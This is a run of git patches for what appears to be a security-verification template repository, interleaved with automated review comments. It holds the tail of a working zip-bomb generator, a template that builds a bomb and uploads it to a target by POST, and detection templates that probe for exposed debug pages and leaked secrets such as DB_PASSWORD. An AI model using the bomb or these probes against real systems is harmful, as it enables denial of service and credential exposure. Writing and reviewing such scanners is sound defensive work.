struct.pack(" 0: + extra += struct.pack(" bomb.zip + {program_name} --num-files=N --max-uncompressed-size=N [OPTIONS...] 
> bomb.zip + +The --num-files option and either the --compressed-size or +--max-uncompressed-size options are required. + + --algorithm=ALG ALG can be "deflate" (default) or "bzip2" + --alphabet=CHARS alphabet for constructing filenames + --compressed-size=N compressed size of the kernel + --extra=HHHH use extra-field quoting with the type tag 0xHHHH + --max-uncompressed-size=N maximum uncompressed size of the kernel + --mode=MODE "no_overlap", "full_overlap", or "quoted_overlap" (default) + --num-files=N number of files to contain, not counting template files + --template=ZIP zip file containing other files to store in the zip bomb + --zip64 enable Zip64 extensions\ +""".format(program_name=sys.argv[0]), file=file) + +def main(): + opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["algorithm=", "alphabet=", "compressed-size=", "extra=", "help", "max-uncompressed-size=", "mode=", "num-files=", "template=", "zip64"]) + assert not args, args + global FILENAME_ALPHABET + mode = write_zip_quoted_overlap + compression_method = COMPRESSION_METHOD_DEFLATE + compressed_size = None + max_uncompressed_size = None + extra_tag = None + template_filenames = [] + zip64 = False + for o, a in opts: + if o == "--algorithm": + compression_method = { + "bzip2": COMPRESSION_METHOD_BZIP2, + "deflate": COMPRESSION_METHOD_DEFLATE, + }[a] + elif o == "--alphabet": + assert len(set(sorted(a))) == len(a), a + FILENAME_ALPHABET = bytes(a, "utf-8") + elif o == "--compressed-size": + compressed_size = int(a) + elif o == "--extra": + # This is an experimental feature that quotes as many files as + # possible inside the Extra Field of local file headers, rather than + # quoting using DEFLATE non-compressed blocks. The argument is a + # 16-bit hexadecimal tag ID. It should be possible to use any tag ID + # that's unallocated in APPNOTE.TXT 4.5.2. 
+ extra_tag = int(a, 16) + elif o == "--max-uncompressed-size": + max_uncompressed_size = int(a) + elif o == "--mode": + mode = { + "no_overlap": write_zip_no_overlap, + "full_overlap": write_zip_full_overlap, + "quoted_overlap": write_zip_quoted_overlap, + }[a] + elif o == "--num-files": + num_files = int(a) + elif o == "--template": + template_filenames.append(a) + elif o == "--zip64": + zip64 = True + elif o in ("-h", "--help"): + usage() + sys.exit(1) + + if extra_tag is not None and mode != write_zip_quoted_overlap: + print("--extra only makes sense with --mode=quoted_overlap", file=sys.stderr) + sys.exit(1) + + template = [] + for filename in template_filenames: + template.extend(load_template(filename)) + + mode(sys.stdout.buffer, num_files, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size, compression_method=compression_method, zip64=zip64, template=template, extra_tag=extra_tag) + +if __name__ == "__main__": + main() From 3d6ab7dbfb11c5a47610dfc5256bc7ce13f42065 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 12:46:50 +0000 Subject: [PATCH 082/129] Create 12.1.1.(2).yaml --- templates/12.1.1.yaml | 2 +- templates/code/12.1.1.2.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml index fc2fe45..3470077 100644 --- a/templates/12.1.1.yaml +++ b/templates/12.1.1.yaml @@ -23,7 +23,7 @@ variables: http: - raw: - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml index 98fa6a8..62b4987 100644 --- a/templates/code/12.1.1.2.yaml +++ b/templates/code/12.1.1.2.yaml 
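Review bot: `num_files` in `main()` is assigned only inside the `elif o == "--num-files"` branch, so running the script without `--num-files` raises `UnboundLocalError` at the final `mode(sys.stdout.buffer, num_files, ...)` call rather than the usage error the help text promises ("The --num-files option and either the --compressed-size or --max-uncompressed-size options are required"). Initialise `num_files = None` next to `compressed_size = None` and `max_uncompressed_size = None`, and check it (and the compressed-size/max-uncompressed-size pair) with an explicit `usage(); sys.exit(1)` instead of the `assert` statements, which are stripped under `python -O`. Smaller point in `bulk_bzip2`: `assert footer == b"\x17\x72\x45\x38\x50\x90", header` reports `header` in its failure message where `footer` is meant. The file also carries no license or attribution header; if it is derived from an external project, the license terms need to be included with it.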
@@ -34,10 +34,10 @@ code: num_files = os.getenv('num-files') compressed_size = os.getenv('compressed-size') subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) - + http: - raw: - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -56,4 +56,4 @@ http: status: - 500 - 503 -# digest: 4b0a00483046022100c965e8aa990ee25114f7e6ee8d12409719404e286ff49c879f842302a18eda14022100a35665298c4e11bdca2517f18b667064a19dfa3657a292f5fd58fb92a594b1b9:99354b7c2d97285abe7401b783fba350 \ No newline at end of file +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file From e25ad20a3a855008e950bddec231960bf7eca82f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 16:38:37 +0330 Subject: [PATCH 083/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 213dda0..ad36a52 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,6 +25,7 @@ jobs: - name: Template Validation run: | + nuclei -ut cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows From b99579d63e858c42d654d63a09ba43da80a0b9b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 13:15:03 +0000 Subject: [PATCH 084/129] fix template validation action --- .github/workflows/template-validate.yml | 1 - templates/12.1.1.yaml | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) 
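Review bot: the `code:` block of templates/code/12.1.1.2.yaml (context lines of this hunk) passes `os.getenv('num-files')` and `os.getenv('compressed-size')` straight into the `subprocess.run` argument list without a `None` check, so an unset variable becomes the literal `--num-files=None` and zipbomb.py then fails on `int(a)`; `subprocess.run` is also called without `check=True` and its return code is never inspected, so a failed generation goes unnoticed and the following `http:` request is sent with no archive. The relative path `code/source/zipbomb.py` additionally assumes the working directory is the repository root. The only change in the hunk itself is whitespace on the `- |` line plus a regenerated `# digest:` trailer; say so in the commit message, since the signature had to be redone purely because of that edit.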
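Review bot: `nuclei -ut` in the Template Validation step fetches the public template repository from the network on every CI run, which makes validation non-reproducible and adds an unpinned external dependency to the pipeline; the next patch in this series (084) removes the line again, so the two should be squashed so the history does not record the flip-flop. If updated upstream templates are genuinely needed, vendor them into the repository (as patch 085 goes on to do) rather than pulling them at validation time.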
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index ad36a52..213dda0 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -25,7 +25,6 @@ jobs: - name: Template Validation run: | - nuclei -ut cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml index 3470077..60d8604 100644 --- a/templates/12.1.1.yaml +++ b/templates/12.1.1.yaml @@ -36,7 +36,7 @@ http: {{rand_text_alpha({{small_file_size}})}} ------WebKitFormBoundaryiugABg7zoMAxIKId-- - - | + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} Accept: */* From a38dc86cf905b61fd8d8fb44ec670e74626cb7ff Mon Sep 17 00:00:00 2001 
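Review bot: in the templates/12.1.1.yaml hunk the `- |` line is replaced by an identical-looking `- |`, i.e. a trailing-whitespace or indentation-only change, the same churn already seen in patch 082. For templates that carry a `# digest:` trailer (12.1.1.2.yaml in patch 082 is one), a whitespace-only edit invalidates the signature and forces it to be regenerated, so either keep those files byte-exact or drop the digest lines from locally maintained templates, and add an editor config or a trailing-whitespace check to the validation workflow so this stops recurring. The workflow hunk only reverts patch 083's `nuclei -ut`; squash the two patches.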
From: Hamed Salimian Date: Sat, 23 Mar 2024 13:41:26 +0000 Subject: [PATCH 085/129] Add workflow templates --- templates/workflows/14.3.2.yaml | 50 ++++++++--------- .../exposures/logs/jboss-seam-debug-page.yaml | 30 +++++++++++ .../exposures/logs/rails-debug-mode.yaml | 24 +++++++++ .../airflow/airflow-debug.yaml | 31 +++++++++++ .../misconfiguration/aspx-debug-mode.yaml | 38 +++++++++++++ .../browserless-debugger.yaml | 33 ++++++++++++ .../misconfiguration/debug/ampache-debug.yaml | 34 ++++++++++++ .../misconfiguration/debug/bottle-debug.yaml | 36 +++++++++++++ .../misconfiguration/django-debug-detect.yaml | 29 ++++++++++ .../laravel-debug-enabled.yaml | 31 +++++++++++ .../misconfiguration/laravel-debug-error.yaml | 26 +++++++++ .../laravel-debug-infoleak.yaml | 53 +++++++++++++++++++ .../logs/django-debug-exposure.yaml | 33 ++++++++++++ .../logs/struts-debug-mode.yaml | 23 ++++++++ .../logs/struts-problem-report.yaml | 29 ++++++++++ .../php-debugbar-exposure.yaml | 34 ++++++++++++ .../misconfiguration/php-errors.yaml | 47 ++++++++++++++++ .../rekognition-image-validation.yaml | 35 ++++++++++++ .../misconfiguration/sitecore-debug-page.yaml | 27 ++++++++++ .../misconfiguration/struts-ognl-console.yaml | 34 ++++++++++++ .../misconfiguration/symfony-debug.yaml | 41 ++++++++++++++ .../misconfiguration/typo3-debug-mode.yaml | 31 +++++++++++ .../misconfiguration/wamp-xdebug-detect.yaml | 29 ++++++++++ .../werkzeug-debugger-detect.yaml | 22 ++++++++ .../jenkins/jenkins-stack-trace.yaml | 32 +++++++++++ 25 files changed, 807 insertions(+), 25 deletions(-) create mode 100644 templates/workflows/exposures/logs/jboss-seam-debug-page.yaml create mode 100644 templates/workflows/exposures/logs/rails-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/airflow/airflow-debug.yaml create mode 100644 templates/workflows/misconfiguration/aspx-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/browserless-debugger.yaml create mode 100644 
templates/workflows/misconfiguration/debug/ampache-debug.yaml create mode 100644 templates/workflows/misconfiguration/debug/bottle-debug.yaml create mode 100644 templates/workflows/misconfiguration/django-debug-detect.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-enabled.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-error.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-infoleak.yaml create mode 100644 templates/workflows/misconfiguration/logs/django-debug-exposure.yaml create mode 100644 templates/workflows/misconfiguration/logs/struts-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/logs/struts-problem-report.yaml create mode 100644 templates/workflows/misconfiguration/php-debugbar-exposure.yaml create mode 100644 templates/workflows/misconfiguration/php-errors.yaml create mode 100644 templates/workflows/misconfiguration/rekognition-image-validation.yaml create mode 100644 templates/workflows/misconfiguration/sitecore-debug-page.yaml create mode 100644 templates/workflows/misconfiguration/struts-ognl-console.yaml create mode 100644 templates/workflows/misconfiguration/symfony-debug.yaml create mode 100644 templates/workflows/misconfiguration/typo3-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/wamp-xdebug-detect.yaml create mode 100644 templates/workflows/technologies/werkzeug-debugger-detect.yaml create mode 100644 templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml index ce7ab3e..3967c7f 100644 --- a/templates/workflows/14.3.2.yaml +++ b/templates/workflows/14.3.2.yaml 
@@ -13,28 +13,28 @@ info: Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. workflows: - - template: misconfiguration/symfony-debug.yaml - - template: exposures/logs/rails-debug-mode.yaml - - template: misconfiguration/debug/bottle-debug.yaml - - template: misconfiguration/debug/ampache-debug.yaml - - template: misconfiguration/laravel-debug-enabled.yaml - - template: misconfiguration/laravel-debug-infoleak.yaml - - template: misconfiguration/laravel-debug-error.yaml - - template: misconfiguration/aspx-debug-mode.yaml - - template: exposures/logs/jboss-seam-debug-page.yaml - - template: misconfiguration/struts-ognl-console.yaml - - template: exposures/logs/struts-problem-report.yaml - - template: misconfiguration/sitecore-debug-page.yaml - - template: exposures/logs/django-debug-exposure.yaml - - template: misconfiguration/rekognition-image-validation.yaml - - template: misconfiguration/browserless-debugger.yaml - - template: exposures/logs/struts-debug-mode.yaml - - template: misconfiguration/django-debug-detect.yaml - - template: misconfiguration/airflow/airflow-debug.yaml - - template: misconfiguration/php-debugbar-exposure.yaml - - template: misconfiguration/wamp-xdebug-detect.yaml - - template: misconfiguration/typo3-debug-mode.yaml - - template: exposures/logs/pyramid-debug-toolbar.yaml - - template: misconfiguration/php-errors.yaml - - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml - - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file + - template: workflows/misconfiguration/symfony-debug.yaml + - template: workflows/exposures/logs/rails-debug-mode.yaml + - template: workflows/misconfiguration/debug/bottle-debug.yaml + - template: workflows/misconfiguration/debug/ampache-debug.yaml + - template: workflows/misconfiguration/laravel-debug-enabled.yaml + - template: 
workflows/misconfiguration/laravel-debug-infoleak.yaml + - template: workflows/misconfiguration/laravel-debug-error.yaml + - template: workflows/misconfiguration/aspx-debug-mode.yaml + - template: workflows/exposures/logs/jboss-seam-debug-page.yaml + - template: workflows/misconfiguration/struts-ognl-console.yaml + - template: workflows/exposures/logs/struts-problem-report.yaml + - template: workflows/misconfiguration/sitecore-debug-page.yaml + - template: workflows/exposures/logs/django-debug-exposure.yaml + - template: workflows/misconfiguration/rekognition-image-validation.yaml + - template: workflows/misconfiguration/browserless-debugger.yaml + - template: workflows/exposures/logs/struts-debug-mode.yaml + - template: workflows/misconfiguration/django-debug-detect.yaml + - template: workflows/misconfiguration/airflow/airflow-debug.yaml + - template: workflows/misconfiguration/php-debugbar-exposure.yaml + - template: workflows/misconfiguration/wamp-xdebug-detect.yaml + - template: workflows/misconfiguration/typo3-debug-mode.yaml + - template: workflows/exposures/logs/pyramid-debug-toolbar.yaml + - template: workflows/misconfiguration/php-errors.yaml + - template: workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: workflows/technologies/werkzeug-debugger-detect.yaml \ No newline at end of file diff --git a/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml new file mode 100644 index 0000000..261c65f --- /dev/null +++ b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml 
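Review bot: the rewritten list still references `workflows/exposures/logs/pyramid-debug-toolbar.yaml`, but that file is not among the 24 templates this patch creates (the `create mode` list above runs from jboss-seam-debug-page.yaml to jenkins-stack-trace.yaml with no pyramid entry), so the workflow points at a template that does not exist in the repository and the `nuclei -validate -w` step has nothing to load for it; either add the template or remove the entry. The file also still ends without a trailing newline (`\ No newline at end of file`).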
@@ -0,0 +1,30 @@ +id: jboss-seam-debug-page + +info: + name: Jboss Seam Debug Page Enabled + author: dhiyaneshDK + severity: medium + description: Jboss Seam Debug Page was exposed. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml + metadata: + max-request: 1 + tags: jboss,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/debug.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "SeamDebugPage" + - "org.jboss.seam" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e8411b45c22ca433e5f3bd5fe956f5b345fc7057cfd50ba2e94466da76bccc48022100d548feaa4f8967210c5093ab640433f3dcbc610e1afe2e12b9bf2232fa240129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/rails-debug-mode.yaml b/templates/workflows/exposures/logs/rails-debug-mode.yaml new file mode 100644 index 0000000..7b30e36 --- /dev/null +++ b/templates/workflows/exposures/logs/rails-debug-mode.yaml @@ -0,0 +1,24 @@ +id: rails-debug-mode + +info: + name: Rails Debug Mode + author: pdteam + severity: medium + description: Rails debug mode is enabled. + metadata: + max-request: 1 + tags: debug,rails,exposure,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and +# digest: 4a0a00473045022032b4ac1b752bc49bad211b086747a6b513069249d0119c514d0c5bb4273ce0f3022100bb3cffbab5dc40220beeb5c9a33a8b54794e5ab5086e8ec6aacbe479ec7c94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/airflow/airflow-debug.yaml b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000..8742106 --- /dev/null +++ b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml 
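Review bot: every vendored template, starting with jboss-seam-debug-page.yaml here, is copied with its upstream `# digest:` trailer intact. That trailer is a signature over the template body and stays valid only while the copy is byte-identical; any local edit breaks it (patch 082 shows the trailer being regenerated after a whitespace change). Decide whether these copies are verbatim mirrors (then record in the commit message which upstream revision they were taken from, so they can be diffed and refreshed) or local forks (then drop the digest lines). rails-debug-mode.yaml is tagged `intrusive` and requests `{{BaseURL}}/{{randstr}}`; worth a line in the 14.3.2 workflow description so operators running it against production know it is not read-only.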
@@ -0,0 +1,31 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + description: Airflow Debug Trace enabled. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/aspx-debug-mode.yaml b/templates/workflows/misconfiguration/aspx-debug-mode.yaml new file mode 100644 index 0000000..4dd64d7 --- /dev/null +++ b/templates/workflows/misconfiguration/aspx-debug-mode.yaml @@ -0,0 +1,38 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: + - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + metadata: + max-request: 1 + tags: debug,misconfig + +http: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'OK' + part: body + + - type: word + words: + - 'Content-Length: 2' + part: header + +# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/browserless-debugger.yaml b/templates/workflows/misconfiguration/browserless-debugger.yaml new file mode 100644 index 0000000..f3ab2b6 --- /dev/null +++ b/templates/workflows/misconfiguration/browserless-debugger.yaml 
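Review bot: the first `words:` entry of airflow-debug.yaml is split across several lines here, with only `Ooops.` surviving and the surrounding markup gone. Confirm the committed file still holds the exact literal the matcher was written for; a truncated literal either never matches or, combined with `condition: and` on a 500 response, matches far more than intended, and the template cannot be reviewed as shown.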
@@ -0,0 +1,33 @@ +id: browserless-debugger + +info: + name: Exposed Browserless debugger + author: ggranjus + severity: medium + description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files. + reference: + - https://docs.browserless.io/docs/docker.html#securing-your-instance + metadata: + max-request: 1 + shodan-query: http.title:"browserless debugger" + tags: browserless,unauth,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "browserless debugger" + - "Click the ► button to run your code." + condition: or + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/ampache-debug.yaml b/templates/workflows/misconfiguration/debug/ampache-debug.yaml new file mode 100644 index 0000000..864f52e --- /dev/null +++ b/templates/workflows/misconfiguration/debug/ampache-debug.yaml @@ -0,0 +1,34 @@ +id: ampache-debug + +info: + name: Ampache Debug Page + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"Ampache -- Debug Page" + tags: misconfig,ampache,debug + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/test.php?action=config' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ampache Debug" + + - type: status + status: + - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/templates/workflows/misconfiguration/debug/bottle-debug.yaml b/templates/workflows/misconfiguration/debug/bottle-debug.yaml new file mode 100644 index 0000000..efc4dd0 --- /dev/null +++ b/templates/workflows/misconfiguration/debug/bottle-debug.yaml @@ -0,0 +1,36 @@ +id: bottle-debug + +info: + name: Bottle debug mode enabled + author: viondexd + severity: info + reference: + - https://bottlepy.org/docs/dev/tutorial.html#debug-mode + metadata: + verified: true + max-request: 1 + shodan-query: html:"Sorry, the requested URL" + tags: bottle,exposure,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Sorry, the requested URL " + - " caused an error:" + condition: and + + - type: word + part: body + words: + - "'{{BaseURL}}'" + - "'{{BaseURL}}/'" + condition: or + +# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/django-debug-detect.yaml b/templates/workflows/misconfiguration/django-debug-detect.yaml new file mode 100644 index 0000000..0b0a84e --- /dev/null +++ b/templates/workflows/misconfiguration/django-debug-detect.yaml 
@@ -0,0 +1,29 @@ +id: django-debug + +info: + name: Django Debug Configuration Enabled + author: dhiyaneshDK,hackergautam + severity: medium + description: Django debug configuration is enabled, which allows an attacker to obtain system configuration information such as paths or settings. + metadata: + max-request: 1 + tags: django,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/NON_EXISTING_PATH/" + + matchers-condition: and + matchers: + - type: word + words: + - URLconf defined + - Page not found + - Django tried these URL patterns, in this order + condition: and + + - type: status + status: + - 404 +# digest: 4a0a0047304502204a5ac1486faa3be8702801b635c79e5a565724d1843641c69a5a09d012b23233022100a2ce507b92c7ffc804f071bc47c76185c97613307e1e15be73a224a45da5fa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-enabled.yaml b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml new file mode 100644 index 0000000..1b0a861 --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml @@ -0,0 +1,31 @@ +id: laravel-debug-enabled + +info: + name: Laravel Debug Enabled + author: notsoevilweasel + severity: medium + description: | + Laravel with APP_DEBUG set to true is prone to show verbose errors. + remediation: | + Disable Laravel's debug mode by setting APP_DEBUG to false. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/_ignition/health-check" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - can_execute_commands + + - type: status + status: + - 200 + +# digest: 4a0a00473045022021f5d4e0139f8896fd4f330b08e129cdf385a67aab51ba5516fafd4b4ff0335a022100d877024cf9f3def775870120ada78e34b730ef7acdf0c6b30f58fff4f9ec6549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/templates/workflows/misconfiguration/laravel-debug-error.yaml b/templates/workflows/misconfiguration/laravel-debug-error.yaml new file mode 100644 index 0000000..9f775ad --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-error.yaml @@ -0,0 +1,26 @@ +id: laravel-debug-error + +info: + name: Larvel Debug Method Enabled + author: dhiyaneshDK + severity: medium + description: Larvel Debug method is enabled. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Whoops! There was an error + + - type: status + status: + - 500 +# digest: 4b0a00483046022100a27980313b04765c0889cf3781ae98a717537c8bf226181548f1befb4b88bc0b022100b5c1947c8918d39d6a6e27b7917edc78bb098d331d886b26e3ac00da1603a76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml new file mode 100644 index 0000000..af8a6bd --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml 
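Review bot: `name: Larvel Debug Method Enabled` and `description: Larvel Debug method is enabled.` in laravel-debug-error.yaml misspell Laravel. Fix both, and since that edit invalidates the copied `# digest:` trailer anyway, drop or regenerate the trailer in the same change.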
@@ -0,0 +1,53 @@ +id: laravel-debug-infoleak + +info: + name: Laravel Debug Info Leak + author: pwnhxl + severity: medium + description: | + This template can be used to detect a Laravel debug information leak by making a POST-based request. + reference: + - https://github.com/dem0ns/improper/blob/master/laravel/5_debug/1.png + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cwe-id: CWE-215 + metadata: + verified: true + max-request: 1 + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" + tags: misconfig,laravel,debug,infoleak + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'vendor/laravel/framework/src/Illuminate/' + - 'MethodNotAllowedHttpException' + condition: and + + - type: word + part: body + words: + - 'DB_PASSWORD' + - 'REDIS_PASSWORD' + - 'MAIL_PASSWORD' + - 'ALIYUN_ACCESSKEYSECRET' + - 'ALIYUN_ACCESSKEYID' + - 'SMS_AUTH_TOKEN' + - 'APP_KEY' + condition: or + + - type: status + status: + - 405 + +# digest: 4a0a00473045022100efe35d703b8ce007284a549152d7642cbaa469dc719432098c9e359f0cdc9e5c02206f93a03a347968aef317624daa120c7827f1bdef918edeb7c5a7d9d50a968827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml b/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml new file mode 100644 index 0000000..31c6aaa --- /dev/null +++ b/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml 
@@ -0,0 +1,33 @@ +id: django-debug-exposure + +info: + name: Django Debug Exposure + author: geeknik + severity: high + description: Django debug mode enabled exposes internal information. + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 + metadata: + max-request: 1 + tags: django,exposure + +http: + - method: POST + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" + condition: and +# digest: 4a0a00473045022075f8eb23f058287e94f409e156c595d9a3160eeca81f66a83d61be4144301dc7022100a96b53e8b7688c50241e531c5e45dac6fb3788d27fce1f21ac315b1279ddbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml b/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml new file mode 100644 index 0000000..f0c8fb6 --- /dev/null +++ b/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml @@ -0,0 +1,23 @@ +id: struts-debug-mode + +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + description: Apache Struts debug mode is enabled. + metadata: + max-request: 1 + tags: logs,struts,apache,exposure,setup + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "" + - "" + condition: and +# digest: 4a0a00473045022100bf6dbd31ef92f8e1dc40fb686e16761845933696c79fb4bb1b2576a03644deb0022005dd1ca7689260b05edd0714b26365856dec3d802159866075540766f352e443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-problem-report.yaml b/templates/workflows/misconfiguration/logs/struts-problem-report.yaml new file mode 100644 index 0000000..2c1bfa9 --- /dev/null +++ b/templates/workflows/misconfiguration/logs/struts-problem-report.yaml 
